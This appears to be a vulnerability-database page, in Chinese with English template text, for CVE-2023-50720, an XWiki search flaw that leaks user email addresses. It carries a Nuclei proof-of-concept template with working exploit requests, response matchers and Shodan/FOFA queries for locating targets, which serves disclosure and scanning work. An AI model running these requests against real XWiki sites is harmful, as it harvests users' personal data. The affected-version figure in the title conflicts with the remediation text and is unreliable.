CVE-2023-50720: XWiki < 4.10.15 - Email Disclosure

日期: 2025-08-01 | 影响软件: XWiki | POC: 已公开

漏洞描述

The Solr-based search in XWiki discloses the email addresses of users even when obfuscation of email addresses is enabled. To demonstrate the vulnerability, search for objcontent:email* using XWiki's regular search interface.

PoC代码[已公开]

id: CVE-2023-50720

info:
  name: XWiki < 4.10.15 - Email Disclosure
  author: ritikchaddha
  severity: medium
  description: |
    The Solr-based search in XWiki discloses the email addresses of users even when obfuscation of email addresses is enabled. To demonstrate the vulnerability, search for objcontent:email* using XWiki's regular search interface.
  impact: |
    Successful exploitation could lead to disclosure of the email of all the users.
  remediation: |
    This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1 by not indexing email address properties when obfuscation is enabled.
  reference:
    - https://jira.xwiki.org/browse/XWIKI-20371
    - https://nvd.nist.gov/vuln/detail/CVE-2023-50720
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-50720
    cwe-id: CWE-200
    epss-score: 0.514
    epss-percentile: 0.97812
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    verified: true
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2024,xwiki,email,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/bin/view/Main/Search?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_locale=en&f_locale=&text=objcontent%3Aemail*"
      - "{{BaseURL}}/xwiki/bin/view/Main/Search?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_locale=en&f_locale=&text=objcontent%3Aemail*"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "email</span> :"
          - "XWiki.XWikiUsers[0]"
          - "email_checked</span>"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ed49d22228608ef26d7bbf30201d0d3255c777fde051f4c8264c6e1f37a4d846022100c08a7a39fc6f323a38243c41f9b1585e38a3d633f6c726c48b6ab09a15389d34:922c64590222798bb761d5b6d8e72950

相关漏洞推荐